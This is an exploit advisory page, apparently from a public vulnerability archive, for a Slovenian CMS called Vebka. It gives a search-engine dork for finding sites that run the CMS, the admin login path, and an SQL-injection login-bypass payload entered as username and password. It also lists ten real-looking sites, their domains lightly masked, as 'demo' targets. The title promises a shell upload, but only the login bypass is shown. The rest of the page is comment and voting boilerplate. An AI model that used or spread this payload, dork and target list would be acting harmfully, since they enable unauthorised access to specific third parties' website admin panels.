Vebka Cms shell upload

2015.12.18

Credit: Ashiyane Digital Security Team

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: "Urejanje strani" "Uporabniško ime" "/admin"

|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|
+ Exploit Title : Vebka Cms shell upload
+ Exploit Author : Ashiyane Digital Security Team
+ Vendor Homepage : http://www.vebka.si/
+ Google Dork : "Urejanje strani" "Uporabniško ime" "/admin"
+ Date: 18.12.2015
+ Tested On : Win 8.1
|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|
|-| Admin Page => /admin/
|-| username: '=' 'or'
|-| password: '=' 'or'
|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|
|-| Demo(s) Site :
http://www.at-kastXelec.si/admin/
http://www.plesniXklub-art.com/admin/
http://unesco-soXle.si/admin/
http://www.cmXe-orodjarstvo.si/admin/
http://www.robor.siX/admin/
http://selitveni-serXvis.net/admin/
http://www.os-mXojstrana.si/admin/
http://biomasa-Xmarkun.si/admin/
http://promociXjskavoda.si/admin/
http://www.aXrchdesign.si/admin
|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|
|-| Discovered by : amin0461
|-| special tanx: malw4r3 - 4TT4CK3R
|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Vebka Cms shell upload

Dork: "Urejanje strani" "Uporabniško ime" "/admin"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.